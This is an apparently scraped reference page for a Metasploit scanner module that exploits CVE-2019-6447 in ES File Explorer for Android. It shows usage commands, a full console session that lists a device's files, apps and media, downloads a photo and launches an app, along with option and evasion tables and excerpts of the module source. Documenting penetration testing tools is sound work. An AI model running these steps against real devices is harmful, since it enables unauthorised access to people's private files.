ES File Explorer Open Port - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/http/es_file_explorer_open_port metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ES File Explorer Open Port
Module: auxiliary/scanner/http/es_file_explorer_open_port
Source code: modules/auxiliary/scanner/http/es_file_explorer_open_port.rb
Disclosure date: 2019-01-16
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 59777
List of CVEs: CVE-2019-6447
This module connects to ES File Explorer's HTTP server to run certain commands. The HTTP server is started on app launch, and is available as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable This module has been tested against 4.1.9.5.1.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/http/es_file_explorer_open_port
msf auxiliary(es_file_explorer_open_port) > show options
... show and set options ...
msf auxiliary(es_file_explorer_open_port) > set RHOSTS ip-range
msf auxiliary(es_file_explorer_open_port) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(es_file_explorer_open_port) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(es_file_explorer_open_port) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(es_file_explorer_open_port) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
ES File Explorer has an HTTP server that runs and accepts certain commands. The HTTP server is started on app launch, and is available as long as the app is open. ES File Explorer launches as a service in the background on device boot. Version 4.1.9.7.4 and below are reported vulnerable. This module has been tested against 4.1.9.5.1.
This module includes all functionality from the original POC
except for the getAppThumbnail
command.
Available actions:
- APPLAUNCH Launch an app. ACTIONITEM required.
- GETDEVICEINFO Get device info
- GETFILE Get a file from the device. ACTIONITEM required.
- LISTAPPS List all the apps installed
- LISTAPPSALL List all the apps installed
- LISTAPPSPHONE List all the phone apps installed
- LISTAPPSSDCARD List all the apk files stored on the sdcard
- LISTAPPSSYSTEM List all the system apps installed
- LISTAUDIOS List all the audio files
- LISTFILES List all the files on the sdcard
- LISTPICS List all the pictures
- LISTVIDEOS List all the videos
Not all of the information from the commands is printed to screen, however the origin JSON content is stored in loot for reference.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use modules/auxiliary/scanner/http/es_file_explorer_open_port
- Do:
run
- You should get device information
Options
ACTION
The action to perform. See description in Vulnerable Application section for additional details. Default is GETDEVICEINFO
.
ACTIONITEM
If running APPLAUNCH
or GETFILE
, this is the app to launch or file to download.
Scenarios
ES File Explorer 4.1.9.5.1 on a Dragon Touch Y88X on Android 4.4
resource (es.rb)> use modules/auxiliary/scanner/http/es_file_explorer_open_port
resource (es.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (es.rb)> set action GETDEVICEINFO
action => GETDEVICEINFO
resource (es.rb)> run
[+] 1.1.1.1:59777 - Name: Y88X
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTFILES
action => LISTFILES
resource (es.rb)> run
[+] 1.1.1.1:59777
folder: bootloader (0.00 Bytes) - 3/23/2019 10:36:51 AM
folder: databk (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: sdcard (4.00 KB) - 3/23/2019 02:15:24 PM
folder: storage (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: config (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: cache (4.00 KB) - 3/24/2019 07:37:46 AM
folder: acct (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: vendor (4.00 KB) - 1/31/2015 05:56:49 AM
folder: d (0.00 Bytes) - 12/31/1969 07:00:00 PM
folder: etc (4.00 KB) - 2/3/2015 03:51:06 AM
folder: mnt (0.00 Bytes) - 3/23/2019 10:36:49 AM
file: ueventd.sun8i.rc (1.18 KB) - 12/31/1969 07:00:00 PM
file: ueventd.rc (3.93 KB) - 12/31/1969 07:00:00 PM
folder: system (4.00 KB) - 12/31/1969 07:00:00 PM
folder: sys (0.00 Bytes) - 3/23/2019 10:36:45 AM
file: sepolicy (73.82 KB) - 12/31/1969 07:00:00 PM
file: seapp_contexts (656.00 Bytes) - 12/31/1969 07:00:00 PM
folder: sbin (0.00 Bytes) - 12/31/1969 07:00:00 PM
folder: res (0.00 Bytes) - 12/31/1969 07:00:00 PM
file: property_contexts (2.11 KB) - 12/31/1969 07:00:00 PM
folder: proc (0.00 Bytes) - 12/31/1969 07:00:00 PM
file: nand.ko (1.47 MB) - 12/31/1969 07:00:00 PM
file: initlogo.rle (2.34 MB) - 12/31/1969 07:00:00 PM
file: init.usb.rc (3.82 KB) - 12/31/1969 07:00:00 PM
file: init.trace.rc (1.75 KB) - 12/31/1969 07:00:00 PM
file: init.sunxi.wifi.bt.rc (1010.00 Bytes) - 12/31/1969 07:00:00 PM
file: init.sun8i.usb.rc (3.40 KB) - 12/31/1969 07:00:00 PM
file: init.sun8i.rc (4.67 KB) - 12/31/1969 07:00:00 PM
file: init.recovery.sun8i.rc (97.00 Bytes) - 12/31/1969 07:00:00 PM
file: init.rc (23.12 KB) - 12/31/1969 07:00:00 PM
file: init.environ.rc (919.00 Bytes) - 12/31/1969 07:00:00 PM
file: init (183.40 KB) - 12/31/1969 07:00:00 PM
file: fstab.sun8i (1.64 KB) - 12/31/1969 07:00:00 PM
file: file_contexts (9.03 KB) - 12/31/1969 07:00:00 PM
file: default.prop (116.00 Bytes) - 12/31/1969 07:00:00 PM
folder: data (4.00 KB) - 3/23/2019 10:36:52 AM
file: charger (274.11 KB) - 12/31/1969 07:00:00 PM
folder: root (0.00 Bytes) - 1/31/2015 05:24:35 AM
folder: dev (2.62 KB) - 3/23/2019 10:37:14 AM
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTVIDEOS
action => LISTVIDEOS
resource (es.rb)> run
[+] 1.1.1.1:59777
DragonTouch-text.mp4 (55.30 MB) - 1/20/1970 10:18:53 PM: /storage/emulated/0/Movies/DragonTouch-text.mp4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAUDIOS
action => LISTAUDIOS
resource (es.rb)> run
[+] 1.1.1.1:59777
Calendar Notification.ogg (52.89 KB) - 8/6/2015 08:15:30 PM: /storage/emulated/0/Notifications/Calendar Notification.ogg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSSYSTEM
action => LISTAPPSSYSTEM
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
...snip...
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSPHONE
action => LISTAPPSPHONE
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
Mobile Data (com.android.phone) Version: 4.4.2-20150203
Calculator (com.android.calculator2) Version: 4.4.2-20150203
...snip...
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Face Unlock (com.android.facelock) Version: 4.4.2-940549
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSSDCARD
action => LISTAPPSSDCARD
resource (es.rb)> run
[+] 1.1.1.1:59777
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSALL
action => LISTAPPSALL
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
...snip...
com.android.keyguard (com.android.keyguard) Version: 4.4.2-20150203
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Face Unlock (com.android.facelock) Version: 4.4.2-940549
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTPICS
action => LISTPICS
resource (es.rb)> run
[+] 1.1.1.1:59777
IMG_20190323_165608.jpg (140.06 KB) - 3/23/2019 04:56:08 PM: /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action GETFILE
action => GETFILE
resource (es.rb)> set actionitem /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
actionitem => /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
resource (es.rb)> run
[+] 1.1.1.1:59777 - /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg saved to /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPS
action => LISTAPPS
resource (es.rb)> run
[+] 1.1.1.1:59777
TalkBack (com.google.android.marvin.talkback) Version: 5.0.7
Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)
Phone (com.andriod.phone) Version: 1.0
Google Play Music (com.google.android.music) Version: 8.12.7210-1.F
Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596
Cloud Print (com.google.android.apps.cloudprint) Version: 1.40
com.softwinner.videotest (com.softwinner.videotest) Version: 1.0
APUS (com.apusapps.launcher) Version: 2.3.1
Settings (com.android.system.io.settings) Version: 11.1.0
DragonPhone (com.softwinner.dragonphone) Version: 1.0
com.mediatek.touch (com.mediatek.touch) Version: 21_zh80001
Google Play Store (com.android.vending) Version: 13.9.17-all [0] [PR] 236777123
com.android.google.settings (com.android.google.settings) Version: 17_zh10317
MainActivity (com.metasploit.stage) Version: 1.0
Gmail (com.google.android.gm) Version: 8.6.3.200445973.release
L-Uninstall (com.clear.uninstall) Version: 2.0
ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.5.1
DragonFire-v2.3 (com.softwinner.dragonfire) Version: 2.3 release
YouTube (com.google.android.youtube) Version: 13.23.59
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Chrome (com.android.chrome) Version: 67.0.3396.87
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action APPLAUNCH
action => APPLAUNCH
resource (es.rb)> set actionitem com.android.chrome
actionitem => com.android.chrome
resource (es.rb)> run
[+] 1.1.1.1:59777 - com.android.chrome launched successfully
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
1.1.1.1 getDeviceInfo.json es_file_explorer_getdeviceinfo.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_getDeviceInfo.js_744272.bin
1.1.1.1 listFiles.json es_file_explorer_listfiles.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listFiles.json_522563.bin
1.1.1.1 listVideos.json es_file_explorer_listvideos.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listVideos.json_623335.bin
1.1.1.1 listAudio.json es_file_explorer_listaudio.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listAudio.json_331531.bin
1.1.1.1 listAppsSystem.json es_file_explorer_listappssystem.json application/json /root/.msf4/loot/20190324073821_default_1.1.1.1_listAppsSystem.j_581712.bin
1.1.1.1 listAppsPhone.json es_file_explorer_listappsphone.json application/json /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsPhone.js_773512.bin
1.1.1.1 listAppsSdcard.json es_file_explorer_listappssdcard.json application/json /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsSdcard.j_543396.bin
1.1.1.1 listAppsAll.json es_file_explorer_listappsall.json application/json /root/.msf4/loot/20190324073854_default_1.1.1.1_listAppsAll.json_886297.bin
1.1.1.1 listPics.json es_file_explorer_listpics.json application/json /root/.msf4/loot/20190324073855_default_1.1.1.1_listPics.json_831055.bin
1.1.1.1 getFile /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg application/octet-stream /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
1.1.1.1 listApps.json es_file_explorer_listapps.json application/json /root/.msf4/loot/20190324073856_default_1.1.1.1_listApps.json_189709.bin
Go back to menu.
Msfconsole Usage
Here is how the scanner/http/es_file_explorer_open_port auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/http/es_file_explorer_open_port
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show info
Name: ES File Explorer Open Port
Module: auxiliary/scanner/http/es_file_explorer_open_port
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-01-16
Provided by:
���������������������
moonbocal
fs0c131y
h00die
Available actions:
Name Description
---- -----------
APPLAUNCH Launch an app. ACTIONITEM required.
GETDEVICEINFO Get device info
GETFILE Get a file from the device. ACTIONITEM required.
LISTAPPS List all the apps installed
LISTAPPSALL List all the apps installed
LISTAPPSPHONE List all the phone apps installed
LISTAPPSSDCARD List all the apk files stored on the sdcard
LISTAPPSSYSTEM List all the system apps installed
LISTAUDIOS List all the audio files
LISTFILES List all the files on the sdcard
LISTPICS List all the pictures
LISTVIDEOS List all the videos
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIONITEM no If an app or filename if required by the action
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 59777 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Description:
This module connects to ES File Explorer's HTTP server to run
certain commands. The HTTP server is started on app launch, and is
available as long as the app is open. Version 4.1.9.7.4 and below
are reported vulnerable This module has been tested against
4.1.9.5.1.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-6447
https://www.ms509.com/2016/03/01/es-explorer-vul/
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://twitter.com/fs0c131y/status/1085460755313508352
Module Options
This is a complete list of options available in the scanner/http/es_file_explorer_open_port auxiliary module:
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show options
Module options (auxiliary/scanner/http/es_file_explorer_open_port):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIONITEM no If an app or filename if required by the action
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 59777 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
GETDEVICEINFO Get device info
Advanced Options
Here is a complete list of advanced options supported by the scanner/http/es_file_explorer_open_port auxiliary module:
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show advanced
Module advanced options (auxiliary/scanner/http/es_file_explorer_open_port):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/http/es_file_explorer_open_port module can do:
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show actions
Auxiliary actions:
Name Description
---- -----------
APPLAUNCH Launch an app. ACTIONITEM required.
GETDEVICEINFO Get device info
GETFILE Get a file from the device. ACTIONITEM required.
LISTAPPS List all the apps installed
LISTAPPSALL List all the apps installed
LISTAPPSPHONE List all the phone apps installed
LISTAPPSSDCARD List all the apk files stored on the sdcard
LISTAPPSSYSTEM List all the system apps installed
LISTAUDIOS List all the audio files
LISTFILES List all the files on the sdcard
LISTPICS List all the pictures
LISTVIDEOS List all the videos
Evasion Options
Here is the full list of possible evasion options supported by the scanner/http/es_file_explorer_open_port auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- Action item is a path for GETFILE, like /system/app/Browser.apk
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable, Bad Response. File may not be available for download.
- Action item is a path for GETFILE, like com.android.chrome
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable, Bad Response. File may not be available for download.
- <PEER>- Application <ACTIONITEM> not found on device
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
74: def run_host(target_host)
75: case
76: when action.name == 'LISTFILES'
77: res = http_post('listFiles')
78: unless res
79: print_error("#{peer}- Error Connecting")
80: return
81: end
82: unless res.code == 200
83: print_error("#{peer}- Not Vulnerable or Bad Response")
84: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
78: unless res
79: print_error("#{peer}- Error Connecting")
80: return
81: end
82: unless res.code == 200
83: print_error("#{peer}- Not Vulnerable or Bad Response")
84: return
85: end
86: path = store_loot('listFiles.json', 'application/json', target_host, res.body, 'es_file_explorer_listfiles.json')
87: vprint_good("#{peer}- Result saved to #{path}")
88: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
92: end
93: print_good(pretty_response)
94: when action.name == 'LISTPICS'
95: res = http_post('listPics')
96: unless res
97: print_error("#{peer}- Error Connecting")
98: return
99: end
100: unless res.code == 200
101: print_error("#{peer}- Not Vulnerable or Bad Response")
102: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
96: unless res
97: print_error("#{peer}- Error Connecting")
98: return
99: end
100: unless res.code == 200
101: print_error("#{peer}- Not Vulnerable or Bad Response")
102: return
103: end
104: path = store_loot('listPics.json', 'application/json', target_host, res.body, 'es_file_explorer_listpics.json')
105: vprint_good("#{peer}- Result saved to #{path}")
106: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
110: end
111: print_good(pretty_response)
112: when action.name == 'LISTVIDEOS'
113: res = http_post('listVideos')
114: unless res
115: print_error("#{peer}- Error Connecting")
116: return
117: end
118: unless res.code == 200
119: print_error("#{peer}- Not Vulnerable or Bad Response")
120: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
114: unless res
115: print_error("#{peer}- Error Connecting")
116: return
117: end
118: unless res.code == 200
119: print_error("#{peer}- Not Vulnerable or Bad Response")
120: return
121: end
122: path = store_loot('listVideos.json', 'application/json', target_host, res.body, 'es_file_explorer_listvideos.json')
123: vprint_good("#{peer}- Result saved to #{path}")
124: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
128: end
129: print_good(pretty_response)
130: when action.name == 'LISTAUDIOS'
131: res = http_post('listAudios')
132: unless res
133: print_error("#{peer}- Error Connecting")
134: return
135: end
136: unless res.code == 200
137: print_error("#{peer}- Not Vulnerable or Bad Response")
138: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
132: unless res
133: print_error("#{peer}- Error Connecting")
134: return
135: end
136: unless res.code == 200
137: print_error("#{peer}- Not Vulnerable or Bad Response")
138: return
139: end
140: path = store_loot('listAudio.json', 'application/json', target_host, res.body, 'es_file_explorer_listaudio.json')
141: vprint_good("#{peer}- Result saved to #{path}")
142: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
146: end
147: print_good(pretty_response)
148: when action.name == 'LISTAPPS'
149: res = http_post('listApps')
150: unless res
151: print_error("#{peer}- Error Connecting")
152: return
153: end
154: unless res.code == 200
155: print_error("#{peer}- Not Vulnerable or Bad Response")
156: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
150: unless res
151: print_error("#{peer}- Error Connecting")
152: return
153: end
154: unless res.code == 200
155: print_error("#{peer}- Not Vulnerable or Bad Response")
156: return
157: end
158: path = store_loot('listApps.json', 'application/json', target_host, res.body, 'es_file_explorer_listapps.json')
159: vprint_good("#{peer}- Result saved to #{path}")
160: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
164: end
165: print_good(pretty_response)
166: when action.name == 'LISTAPPSSYSTEM'
167: res = http_post('listAppsSystem')
168: unless res
169: print_error("#{peer}- Error Connecting")
170: return
171: end
172: unless res.code == 200
173: print_error("#{peer}- Not Vulnerable or Bad Response")
174: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
168: unless res
169: print_error("#{peer}- Error Connecting")
170: return
171: end
172: unless res.code == 200
173: print_error("#{peer}- Not Vulnerable or Bad Response")
174: return
175: end
176: path = store_loot('listAppsSystem.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssystem.json')
177: vprint_good("#{peer}- Result saved to #{path}")
178: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
182: end
183: print_good(pretty_response)
184: when action.name == 'LISTAPPSPHONE'
185: res = http_post('listAppsPhone')
186: unless res
187: print_error("#{peer}- Error Connecting")
188: return
189: end
190: unless res.code == 200
191: print_error("#{peer}- Not Vulnerable or Bad Response")
192: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
186: unless res
187: print_error("#{peer}- Error Connecting")
188: return
189: end
190: unless res.code == 200
191: print_error("#{peer}- Not Vulnerable or Bad Response")
192: return
193: end
194: path = store_loot('listAppsPhone.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsphone.json')
195: vprint_good("#{peer}- Result saved to #{path}")
196: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
200: end
201: print_good(pretty_response)
202: when action.name == 'LISTAPPSSDCARD'
203: res = http_post('listAppsSdcard')
204: unless res
205: print_error("#{peer}- Error Connecting")
206: return
207: end
208: unless res.code == 200
209: print_error("#{peer}- Not Vulnerable or Bad Response")
210: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
204: unless res
205: print_error("#{peer}- Error Connecting")
206: return
207: end
208: unless res.code == 200
209: print_error("#{peer}- Not Vulnerable or Bad Response")
210: return
211: end
212: path = store_loot('listAppsSdcard.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssdcard.json')
213: vprint_good("#{peer}- Result saved to #{path}")
214: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
218: end
219: print_good(pretty_response)
220: when action.name == 'LISTAPPSALL'
221: res = http_post('listAppsAll')
222: unless res
223: print_error("#{peer}- Error Connecting")
224: return
225: end
226: unless res.code == 200
227: print_error("#{peer}- Not Vulnerable or Bad Response")
228: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
222: unless res
223: print_error("#{peer}- Error Connecting")
224: return
225: end
226: unless res.code == 200
227: print_error("#{peer}- Not Vulnerable or Bad Response")
228: return
229: end
230: path = store_loot('listAppsAll.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsall.json')
231: vprint_good("#{peer}- Result saved to #{path}")
232: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
236: end
237: print_good(pretty_response)
238: when action.name == 'GETDEVICEINFO'
239: res = http_post('getDeviceInfo')
240: unless res
241: print_error("#{peer}- Error Connecting")
242: return
243: end
244: unless res.code == 200
245: print_error("#{peer}- Not Vulnerable or Bad Response")
246: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
240: unless res
241: print_error("#{peer}- Error Connecting")
242: return
243: end
244: unless res.code == 200
245: print_error("#{peer}- Not Vulnerable or Bad Response")
246: return
247: end
248: path = store_loot('getDeviceInfo.json', 'application/json', target_host, res.body, 'es_file_explorer_getdeviceinfo.json')
249: vprint_good("#{peer}- Result saved to #{path}")
250: json_resp = JSON.parse(sanitize_json(res.body))
Action item is a path for GETFILE, like /system/app/Browser.apk
Here is a relevant code snippet related to the "Action item is a path for GETFILE, like /system/app/Browser.apk" error message:
249: vprint_good("#{peer}- Result saved to #{path}")
250: json_resp = JSON.parse(sanitize_json(res.body))
251: print_good("#{peer}- Name: #{json_resp['name']}")
252: when action.name == 'GETFILE'
253: unless datastore['ACTIONITEM'].start_with?('/')
254: print_error('Action item is a path for GETFILE, like /system/app/Browser.apk')
255: end
256: res = send_request_raw(
